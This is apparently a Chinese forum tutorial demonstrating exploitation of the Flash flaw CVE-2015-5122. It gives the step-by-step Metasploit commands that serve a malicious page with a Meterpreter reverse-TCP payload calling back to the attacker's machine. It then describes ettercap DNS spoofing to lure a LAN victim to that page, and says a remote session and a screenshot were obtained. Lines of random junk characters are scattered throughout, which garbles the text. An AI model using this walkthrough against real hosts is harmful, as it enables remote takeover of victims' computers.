9 ~8 n R8 E" w 二、cve2015-5122漏洞实例演示虚拟机
( W& {7 R& K8 h& |3 w6 y
# k" r' i0 N& H0 ?/ O; y! B8 R7 [* S6 z5 d; R5 [* {7 @
关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: : s0 }5 C" o! Y; F# i$ k
2 \# N' Z4 n4 ~9 F2 t
7 V, N7 P( F" r2 \+ B search cve-2015-5122如图: 4 h- p% K! x+ @! q) h* O Z
2 N) ^5 {6 Z! g/ p
0 x( @& I" i& E . u6 L: w% X; B
, Q, R& d- g! m) S6 J, g/ C
& E0 J' d3 L7 @9 m4 S 下面我们敲如下命令:
, h6 G' _+ g3 E3 }# a' }
% ]/ u; m; O, i4 v
! A" I x& R6 U: L4 \4 c- |4 ^ use exploit/multi/browser/adobe_flash_opaque_background_uaf 6 \- {& O; W3 `( S: d
- X. L6 s8 p* y/ v' d; C
9 m9 e9 A! n" X4 v
set PAYLOAD windows/meterpreter/reverse_tcp
; @6 r T- f- \8 J . b; P9 T. X4 i0 h6 o" ~; w
% Q& h0 j* ]. ~/ Z1 F set LHOST 192.168.0.109
4 a) X2 l6 A7 C$ f+ ^% S. ^ ; z9 Y; j/ y* D' ~, v; T
" ~$ l, X/ I6 e& K+ o
set URIPATH / /*根目录*/
7 k9 s( _* `7 R% t% W6 E ! W T% f# Z ]. Q* |
# I9 ~* ` T6 ^# M set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 9 A5 v1 h' C% N. C N6 l4 i
' Y7 h' Q5 Q( y! G- I$ p, v
: `1 m' B: i! S& G9 F" C set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
3 q' i( \8 Y% R0 N8 }% B
6 Q; S% y9 J$ e# n/ P" r" w
% B) l$ H$ X: M8 {( O* W 然后show options如图: ) S3 H% G6 T2 |( ?% {6 r
( U5 C/ Q: v0 b/ @
* ?: X0 V7 Q7 T* J! C% F7 R
& ?/ T( }% a" E+ x! I1 d* T: ?6 D
1 l+ [/ W8 |9 ~( [
. D8 k( h( w( Q9 k. _! m 一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
; _/ j& L; O- O& U5 z' ?* Q* u) X3 e # ~% V; b! p R8 P
# L1 }; L6 D3 ^" j7 A3 Y# r) a) J
" J) y2 a# Z! @# n" }) E+ p
然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
/ T. j; u7 p- O/ h2 [( }/ D, o0 S + K1 \$ H0 p& T
! _7 q; w& R7 b+ t* ]6 S0 b Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
7 Y4 W+ d A Z/ m( h0 g% Z7 j
, f m8 U; j7 x h9 _ l$ V% \; |; v- Q% P* H+ L6 R" @# G
* S- V0 S0 [' H: w e9 S + w. |! R: w% O. p0 S2 Y0 e
9 ?- W% F g, V- S x 成功了,这时候我们断开ettercap,如图: 0 W" x+ I) O1 Q6 v9 Q5 p
' V; I# F, {, @2 z- o7 m
5 ]0 {/ K, y$ U4 U2 ?
2 T. E6 T! d& q& L& V* K # T- Y/ l, K/ P3 j. D$ i4 k2 e
3 W/ Z# D# @+ a9 k+ r$ P+ a; P6 p Screenshot如图: - ^0 q8 W1 Z) \9 l" E6 L6 x' D
( o1 j7 ]0 q+ r! t5 _
2 j; z, _! Y( g& w0 _$ E ) o2 k! \* d$ O. I) Z$ I( I
3 D9 M, f" T, p1 b: q: l
9 c' j4 V! g1 o" @8 y7 a
- Z# Z8 K8 m( n2 K# A- D5 g
|